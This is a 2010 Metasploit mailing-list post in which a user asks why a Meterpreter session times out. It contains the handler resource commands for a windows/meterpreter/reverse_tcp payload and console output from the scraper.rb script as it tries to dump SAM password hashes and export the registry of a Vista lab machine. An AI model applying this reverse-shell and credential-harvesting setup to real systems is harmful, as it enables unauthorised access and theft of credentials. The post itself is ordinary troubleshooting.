Metasploit mailing list archives

[*] Exception: Rex::TimeoutError Operation timed out.


From: ricky-lee birtles <mr.r.birtles () gmail com>
Date: Wed, 20 Jan 2010 14:17:51 +0000

I have just set metasploit up on a fresh ubuntu install and made a exe
that connects back to the multi handler. I get the following output
once the connection is accepted.

root@redblack:/home/usr/Desktop/QuickShare# msfconsole -r auto-handle.rc

                __.                       .__.        .__. __.
  _____   _____/  |______    ____________ |  |   ____ |__|/  |_
 /     \_/ __ \   __\__  \  /  ___/\____ \|  |  /  _ \|  \   __\
|  Y Y  \  ___/|  |  / __ \_\___ \ |  |_> >  |_(  <_> )  ||  |
|__|_|  /\___  >__| (____  /____  >|   __/|____/\____/|__||__|
      \/     \/          \/     \/ |__|


       =[ metasploit v3.3.4-dev [core:3.3 api:1.0]
+ -- --=[ 491 exploits - 231 auxiliary
+ -- --=[ 192 payloads - 23 encoders - 8 nops
       =[ svn r8179 updated today (2010.01.20)

resource> use exploit/multi/handler
resource> set ExitOnSession false
ExitOnSession => false
resource> set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
resource> set LHOST 192.168.100.4
LHOST => 192.168.100.4
resource> set LPORT 446
LPORT => 446
resource> set AutoRunScript scraper.rb
AutoRunScript => scraper.rb
resource> exploit -j
[*] Exploit running as background job.

[*] Starting the payload handler...
[*] Started reverse handler on port 446
msf exploit(handler) > [*] Sending stage (723456 bytes)
[*] Meterpreter session 1 opened (192.168.100.4:446 -> 192.168.100.100:51963)
[*] Session ID 1 (192.168.100.4:446 -> 192.168.100.100:51963)
processing AutoRunScript 'scraper.rb'
[*] New session on 192.168.100.100:51963...
[*] Gathering basic system information...
[*] Error dumping hashes: Rex::Post::Meterpreter::RequestError
priv_passwd_get_sam_hashes: Operation failed: 87
[*] Obtaining the entire registry...
[*]  Exporting HKCU
[*]  Downloading HKCU (C:\Users\usr\AppData\Local\Temp\LDjqwRiw.reg)
[*]  Cleaning HKCU
[*]  Exporting HKLM
[*] Exception: Rex::TimeoutError Operation timed out.
/home/usr/svn/msf3-dev/lib/rex/post/meterpreter/packet_dispatcher.rb:74:in
`send_request'/home/usr/svn/msf3-dev/lib/rex/post/meterpreter/channel.rb:174:in
`_read'/home/usr/svn/msf3-dev/lib/rex/post/meterpreter/channel.rb:152:in
`read'/home/usr/svn/msf3-dev/lib/rex/post/meterpreter/channels/pool.rb:77:in
`read'(eval):117:in `m_exec'(eval):216:in `on_session'(eval):212:in
`each'(eval):212:in `on_session'(eval):73:in
`on_session'/home/usr/svn/msf3-dev/lib/msf/core/handler.rb:219:in
`register_session'/home/usr/svn/msf3-dev/lib/msf/core/handler.rb:202:in
`create_session'/home/usr/svn/msf3-dev/lib/msf/core/payload/stager.rb:128:in
`handle_connection_stage'/home/usr/svn/msf3-dev/lib/msf/core/payload/stager.rb:119:in
`handle_connection'/home/usr/svn/msf3-dev/lib/msf/core/handler/reverse_tcp.rb:136:in
`start_handler'/home/usr/svn/msf3-dev/lib/msf/core/handler/reverse_tcp.rb:134:in
`initialize'/home/usr/svn/msf3-dev/lib/msf/core/handler/reverse_tcp.rb:134:in
`new'/home/usr/svn/msf3-dev/lib/msf/core/handler/reverse_tcp.rb:134:in
`start_handler'/home/usr/svn/msf3-dev/lib/msf/core/handler/reverse_tcp.rb:114:in
`initialize'/home/usr/svn/msf3-dev/lib/msf/core/handler/reverse_tcp.rb:114:in
`new'/home/usr/svn/msf3-dev/lib/msf/core/handler/reverse_tcp.rb:114:in
`start_handler'/home/usr/svn/msf3-dev/lib/msf/core/exploit.rb:410:in
`setup'/home/usr/svn/msf3-dev/lib/msf/core/exploit_driver.rb:173:in
`job_run_proc'/home/usr/svn/msf3-dev/lib/msf/core/exploit_driver.rb:140:in
`run'/home/usr/svn/msf3-dev/lib/rex/job_container.rb:36:in
`call'/home/usr/svn/msf3-dev/lib/rex/job_container.rb:36:in
`start'/home/usr/svn/msf3-dev/lib/rex/job_container.rb:31:in
`initialize'/home/usr/svn/msf3-dev/lib/rex/job_container.rb:31:in
`new'/home/usr/svn/msf3-dev/lib/rex/job_container.rb:31:in
`start'/home/usr/svn/msf3-dev/lib/rex/job_container.rb:171:in
`start_bg_job'/home/usr/svn/msf3-dev/lib/msf/core/exploit_driver.rb:137:in
`run'/home/usr/svn/msf3-dev/lib/msf/base/simple/exploit.rb:120:in
`exploit_simple'/home/usr/svn/msf3-dev/lib/msf/base/simple/exploit.rb:141:in
`exploit_simple'/home/usr/svn/msf3-dev/lib/msf/ui/console/command_dispatcher/exploit.rb:145:in
`cmd_exploit'/home/usr/svn/msf3-dev/lib/rex/ui/text/dispatcher_shell.rb:239:in
`send'/home/usr/svn/msf3-dev/lib/rex/ui/text/dispatcher_shell.rb:239:in
`run_command'/home/usr/svn/msf3-dev/lib/rex/ui/text/dispatcher_shell.rb:201:in
`run_single'/home/usr/svn/msf3-dev/lib/rex/ui/text/dispatcher_shell.rb:195:in
`each'/home/usr/svn/msf3-dev/lib/rex/ui/text/dispatcher_shell.rb:195:in
`run_single'/home/usr/svn/msf3-dev/lib/msf/ui/console/driver.rb:230:in
`load_resource'/home/usr/svn/msf3-dev/lib/msf/ui/console/driver.rb:225:in
`each_line'/home/usr/svn/msf3-dev/lib/msf/ui/console/driver.rb:225:in
`load_resource'/home/usr/svn/msf3-dev/lib/msf/ui/console/driver.rb:154:in
`initialize'/usr/local/bin/msfconsole:92:in
`new'/usr/local/bin/msfconsole:92
msf exploit(handler) >

The target is a vista 64bit box (get the same results regardless to if
the exe is run as a normal user or admin)

Regards,
-- Mr R Birtles
_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework


Current thread: